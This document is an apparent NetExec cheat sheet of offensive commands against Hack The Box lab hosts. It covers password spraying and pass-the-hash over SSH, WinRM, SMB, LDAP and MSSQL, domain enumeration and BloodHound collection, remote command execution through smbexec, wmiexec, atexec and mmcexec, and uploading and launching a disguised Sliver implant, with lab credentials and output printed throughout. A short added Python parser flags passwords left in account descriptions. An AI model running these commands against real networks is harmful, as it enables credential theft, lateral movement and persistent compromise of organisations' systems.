NetExec

SSH

  • attempt ssh authentication to multiple hosts with one set of credentials

./nxc ssh targets.txt -u james -p password123
./nxc ssh targets.txt -u balthazar -p 'password123'
./nxc ssh targets.txt -u root -p asdfghjkl
  • attempt ssh auth to any host in a subnet with one set of credentials

./nxc ssh 172.16.1.0/24 -u james -p password123

WINRM

  • attempt winrm authentication to multiple hosts with one set of credentials

./nxc winrm targets.txt -u balthazar -p 'abc123!!!'
# domain authentication
./nxc winrm targets.txt -u 'HTB.local\balthazar' -p 'abc123!!!' 
./nxc winrm targets.txt -u 'HTB.local\james' -p password123
  • attempt winrm authentication to a domain with a username and hash

./nxc winrm targets.txt -d HTB.local -u blake -H 12f18eteb6f8187fa52f3f729896bbb7
./nxc winrm targets.txt -u Administrator -H b99ed3c3d34c4576bcd33c76420be934
  • winrm with a single username and a password wordlist

./nxc winrm 172.16.1.101 -u dan.hard -p 172.16.1.101/passwordlist.txt 

SMB

  • attempt smb authentication to multiple hosts with one set of credentials

./nxc smb targets.txt -u 'HTB.local\james' -p password123
  • attempt ssh authentication with a keyfile instead of a password

./nxc ssh 172.16.1.0/24 -u root --key-file ./10.10.110.100/ssh/id_rsa -p ''
  • attempt smb auth to any host in a subnet with anonymous logon

./nxc smb 172.16.1.0/24 -u anonymous -p ''
  • smb authentication to a domain with a specific username and attempt a password wordlist

./nxc smb 172.16.1.13 -d DANTE.local -u 'gerald' -p /usr/share/seclists/Passwords/2020-200_most_used_passwords.txt 
  • attempt to authenticate with a known/potential password against a username list

./nxc smb 10.10.11.35 -d cicada.htb -u ~/Documents/htb/cicada/loot/users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' 
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [-] CICADA\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] CICADA\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] CICADA\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] CICADA\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] CICADA\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] CICADA\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [+] CICADA\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 

MSSQL

  • Access MSSQL and run a command with a password

./nxc mssql 172.16.1.5 -u sophie -p thisisagoodpassword -X whoami --local-auth
MSSQL       172.16.1.5      1433   DANTE-SQL01      [*] Windows 10.0 Build 14393 (name:DANTE-SQL01) (domain:DANTE-SQL01)
MSSQL       172.16.1.5      1433   DANTE-SQL01      [+] sophie:thisisagoodpassword(Pwn3d!)
MSSQL       172.16.1.5      1433   DANTE-SQL01      [+] Executed command via mssqlexec
MSSQL       172.16.1.5      1433   DANTE-SQL01      nt service\mssql$sqlexpress
  • kick off a sliver implant in the background

./nxc mssql 172.16.1.5 -u sophie -p thisisagoodpassword -X 'cmd.exe /c start /b C:\Windows\System32\spool\drivers\color\security.exe' --local-auth
[*] Session b00d3dc6 dante-dc01 - 10.10.14.3:33086 (DANTE-SQL01) - windows/amd64 - Sun, 19 May 2024 13:48:24 EDT

Put file

./nxc smb 172.16.1.13 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:d0629f5539666892bf9ba9b34daa125c --put-file /opt/wmiexec2/RuntimeBroker.exe \\xampp\\apache\\bin\\iconv\\RuntimeBroker.exe

./nxc mssql 172.16.1.5 -u sophie -p thisisapassword --put-file /home/ubuntu/Documents/htb/dante/security.exe 'C:\Windows\System32\spool\drivers\color\security.exe' --local-auth

LDAP

  • attempt authentication to ldap with a username list and a valid password

./nxc ldap 10.10.11.35 -d cicada.htb -u ~/Documents/htb/cicada/loot/users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' 
  • list of users and computers with flag TRUSTED_FOR_DELEGATION

./nxc ldap 10.10.11.35 -d cicada.htb -u 'CICADA\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --trusted-for-delegation
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35     389    CICADA-DC        [+] CICADA\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
LDAP        10.10.11.35     389    CICADA-DC        CICADA-DC$
  • get admin count and their usernames

./nxc ldap 10.10.11.35 -d cicada.htb -u 'CICADA\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --admin-count           
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35     389    CICADA-DC        [+] CICADA\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
LDAP        10.10.11.35     389    CICADA-DC        Administrator
LDAP        10.10.11.35     389    CICADA-DC        Administrators
LDAP        10.10.11.35     389    CICADA-DC        Print Operators
LDAP        10.10.11.35     389    CICADA-DC        Backup Operators
LDAP        10.10.11.35     389    CICADA-DC        Replicator
LDAP        10.10.11.35     389    CICADA-DC        krbtgt
LDAP        10.10.11.35     389    CICADA-DC        Domain Controllers
LDAP        10.10.11.35     389    CICADA-DC        Schema Admins
LDAP        10.10.11.35     389    CICADA-DC        Enterprise Admins
LDAP        10.10.11.35     389    CICADA-DC        Domain Admins
LDAP        10.10.11.35     389    CICADA-DC        Server Operators
LDAP        10.10.11.35     389    CICADA-DC        Account Operators
LDAP        10.10.11.35     389    CICADA-DC        Read-only Domain Controllers
LDAP        10.10.11.35     389    CICADA-DC        Key Admins
LDAP        10.10.11.35     389    CICADA-DC        Enterprise Key Admins
LDAP        10.10.11.35     389    CICADA-DC        Dev Support
LDAP        10.10.11.35     389    CICADA-DC        emily.oscars
  • get users on the box, passwords can be in the comment field

./nxc ldap 10.10.11.35 -d cicada.htb -u 'CICADA\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35     389    CICADA-DC        [+] CICADA\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
LDAP        10.10.11.35     389    CICADA-DC        [*] Enumerated 8 domain users: CICADA
LDAP        10.10.11.35     389    CICADA-DC        -Username-                    -Last PW Set-       -BadPW- -Description-      
LDAP        10.10.11.35     389    CICADA-DC        Administrator                 2024-08-26 20:08:03 2       Built-in account for administering the computer/domain
LDAP        10.10.11.35     389    CICADA-DC        Guest                         2024-08-28 17:26:56 2       Built-in account for guest access to the computer/domain
LDAP        10.10.11.35     389    CICADA-DC        krbtgt                        2024-03-14 11:14:10 3       Key Distribution Center Service Account
LDAP        10.10.11.35     389    CICADA-DC        john.smoulder                 2024-03-14 12:17:29 2                          
LDAP        10.10.11.35     389    CICADA-DC        sarah.dantelia                2024-03-14 12:17:29 2                          
LDAP        10.10.11.35     389    CICADA-DC        michael.wrightson             2024-03-14 12:17:29 0                          
LDAP        10.10.11.35     389    CICADA-DC        david.orelious                2024-03-14 12:17:29 0       Just in case I forget my password is aRt$Lp#7t*VQ!3
LDAP        10.10.11.35     389    CICADA-DC        emily.oscars                  2024-08-22 21:20:17 0  
  • get groups on the machine via ldap

./nxc ldap 10.10.11.35 -d cicada.htb -u 'CICADA\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --groups
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35     389    CICADA-DC        [+] CICADA\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
LDAP        10.10.11.35     389    CICADA-DC        Administrators
LDAP        10.10.11.35     389    CICADA-DC        Users
LDAP        10.10.11.35     389    CICADA-DC        Guests
LDAP        10.10.11.35     389    CICADA-DC        Print Operators
LDAP        10.10.11.35     389    CICADA-DC        Backup Operators
LDAP        10.10.11.35     389    CICADA-DC        Replicator
LDAP        10.10.11.35     389    CICADA-DC        Remote Desktop Users
LDAP        10.10.11.35     389    CICADA-DC        Network Configuration Operators
LDAP        10.10.11.35     389    CICADA-DC        Performance Monitor Users
LDAP        10.10.11.35     389    CICADA-DC        Performance Log Users
LDAP        10.10.11.35     389    CICADA-DC        Distributed COM Users
LDAP        10.10.11.35     389    CICADA-DC        IIS_IUSRS
LDAP        10.10.11.35     389    CICADA-DC        Cryptographic Operators
LDAP        10.10.11.35     389    CICADA-DC        Event Log Readers
LDAP        10.10.11.35     389    CICADA-DC        Certificate Service DCOM Access
LDAP        10.10.11.35     389    CICADA-DC        RDS Remote Access Servers
LDAP        10.10.11.35     389    CICADA-DC        RDS Endpoint Servers
LDAP        10.10.11.35     389    CICADA-DC        RDS Management Servers
LDAP        10.10.11.35     389    CICADA-DC        Hyper-V Administrators
LDAP        10.10.11.35     389    CICADA-DC        Access Control Assistance Operators
LDAP        10.10.11.35     389    CICADA-DC        Remote Management Users
--snip--
  • enumerate domain controllers

./nxc ldap 10.10.11.35 -d cicada.htb -u 'CICADA\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --dc-list
  • get active users (non expired) via ldap

./nxc ldap 10.10.11.35 -d cicada.htb -u 'CICADA\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --active-users
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35     389    CICADA-DC        [+] CICADA\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
LDAP        10.10.11.35     389    CICADA-DC        [*] Total records returned: 7, total 1 user(s) disabled
LDAP        10.10.11.35     389    CICADA-DC        -Username-                    -Last PW Set-       -BadPW- -Description-      
LDAP        10.10.11.35     389    CICADA-DC        Administrator                 2024-08-26 20:08:03 2       Built-in account for administering the computer/domain
LDAP        10.10.11.35     389    CICADA-DC        Guest                         2024-08-28 17:26:56 2       Built-in account for guest access to the computer/domain
LDAP        10.10.11.35     389    CICADA-DC        john.smoulder                 2024-03-14 12:17:29 2                          
LDAP        10.10.11.35     389    CICADA-DC        sarah.dantelia                2024-03-14 12:17:29 2                          
LDAP        10.10.11.35     389    CICADA-DC        michael.wrightson             2024-03-14 12:17:29 0                          
LDAP        10.10.11.35     389    CICADA-DC        david.orelious                2024-03-14 12:17:29 0       Just in case I forget my password is aRt$Lp#7t*VQ!3
LDAP        10.10.11.35     389    CICADA-DC        emily.oscars                  2024-08-22 21:20:17 0    
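Added helper, not part of the original page or of NetExec itself: it parses nxc output in the column layout shown above (protocol, IP, port, hostname, message) to summarise the spray results from the SMB section and to audit the `--users` / `--active-users` tables for description fields that mention a password, so those accounts can be remediated. The sample lines and credential strings are constructed for the example.

```python
import re
from collections import Counter

# Constructed sample in the nxc output layout used on this page (not a real capture).
SAMPLE_OUTPUT = r"""
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [-] CICADA\Administrator:Spray-Password1 STATUS_LOGON_FAILURE
SMB         10.10.11.35     445    CICADA-DC        [-] CICADA\Guest:Spray-Password1 STATUS_LOGON_FAILURE
SMB         10.10.11.35     445    CICADA-DC        [+] CICADA\michael.wrightson:Spray-Password1
LDAP        10.10.11.35     389    CICADA-DC        -Username-                    -Last PW Set-       -BadPW- -Description-
LDAP        10.10.11.35     389    CICADA-DC        Administrator                 2024-08-26 20:08:03 2       Built-in account for administering the computer/domain
LDAP        10.10.11.35     389    CICADA-DC        david.orelious                2024-03-14 12:17:29 0       Just in case I forget my password is Example-Secret-1
LDAP        10.10.11.35     389    CICADA-DC        emily.oscars                  2024-08-22 21:20:17 0
"""

# One nxc line: PROTO  IP  PORT  HOSTNAME  message (trailing whitespace dropped).
LINE_RE = re.compile(r"^(?P<proto>\S+)\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+(?P<msg>.*?)\s*$")
# One row of the --users table: name, "YYYY-MM-DD HH:MM:SS", bad-password count, optional description.
USER_ROW_RE = re.compile(r"^(?P<user>\S+)\s+(?P<pwset>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\s+(?P<badpw>\d+)\s*(?P<desc>.*)$")
# Words that suggest a credential was written into the description attribute.
CRED_HINT_RE = re.compile(r"\b(password|passwd|pwd|pass)\b", re.IGNORECASE)


def parse_lines(text):
    """Split nxc output into dicts (proto, ip, port, host, msg); non-matching lines are skipped."""
    return [m.groupdict() for line in text.splitlines() if (m := LINE_RE.match(line))]


def auth_summary(rows):
    """Count [+] / [-] authentication results and list the DOMAIN\\user identities that logged on."""
    counts, valid = Counter(), []
    for r in rows:
        msg = r["msg"]
        if msg.startswith("[+]"):
            counts["success"] += 1
            ident = msg[3:].strip().split()[0]        # "DOMAIN\user:secret"
            valid.append(ident.split(":", 1)[0])      # keep only DOMAIN\user
        elif msg.startswith("[-]"):
            counts["failure"] += 1
    return counts, valid


def flagged_descriptions(rows):
    """Return users from an LDAP --users table whose description field mentions a password."""
    hits = []
    for r in rows:
        if r["proto"] != "LDAP" or r["msg"].startswith(("[", "-Username-")):
            continue                                  # status lines and the table header
        m = USER_ROW_RE.match(r["msg"])
        if m and CRED_HINT_RE.search(m.group("desc")):
            hits.append(m.group("user"))
    return hits


if __name__ == "__main__":
    rows = parse_lines(SAMPLE_OUTPUT)
    counts, valid = auth_summary(rows)
    print(f"auth: {counts['success']} ok, {counts['failure']} failed; valid: {valid}")
    print("descriptions to remediate:", flagged_descriptions(rows))
```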
  • collect BloodHound data remotely over LDAP with NetExec

./nxc ldap 10.10.11.35 -d cicada.htb --dns-server 10.10.11.35 -u 'CICADA\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --bloodhound

Execution of Commands

  • execute cmd.exe command

./nxc smb 10.10.11.35 -d cicada.htb -u 'CICADA\emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' -x whoami
  • execute powershell command

./nxc smb 10.10.11.35 -d cicada.htb -u 'CICADA\emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' -X whoami

mmcexec Execution

  • cmd.exe and powershell.exe

./nxc smb 10.10.11.35 -d cicada.htb -u 'CICADA\emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --exec-method mmcexec -x whoami
./nxc smb 10.10.11.35 -d cicada.htb -u 'CICADA\emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --exec-method mmcexec -X whoami

atexec Scheduled task execution

  • cmd.exe and powershell.exe

./nxc smb 10.10.11.35 -d cicada.htb -u 'CICADA\emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --exec-method atexec -x dir
./nxc smb 10.10.11.35 -d cicada.htb -u 'CICADA\emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --exec-method atexec -X dir

smbexec command execution

  • cmd.exe and powershell.exe

./nxc smb 10.10.11.35 -d cicada.htb -u 'CICADA\emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --exec-method smbexec -x dir
./nxc smb 10.10.11.35 -d cicada.htb -u 'CICADA\emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --exec-method smbexec -X dir

wmiexec command execution

  • cmd.exe and powershell.exe

./nxc smb 10.10.11.35 -d cicada.htb -u 'CICADA\emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --exec-method wmiexec -x dir
./nxc smb 10.10.11.35 -d cicada.htb -u 'CICADA\emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --exec-method wmiexec -X dir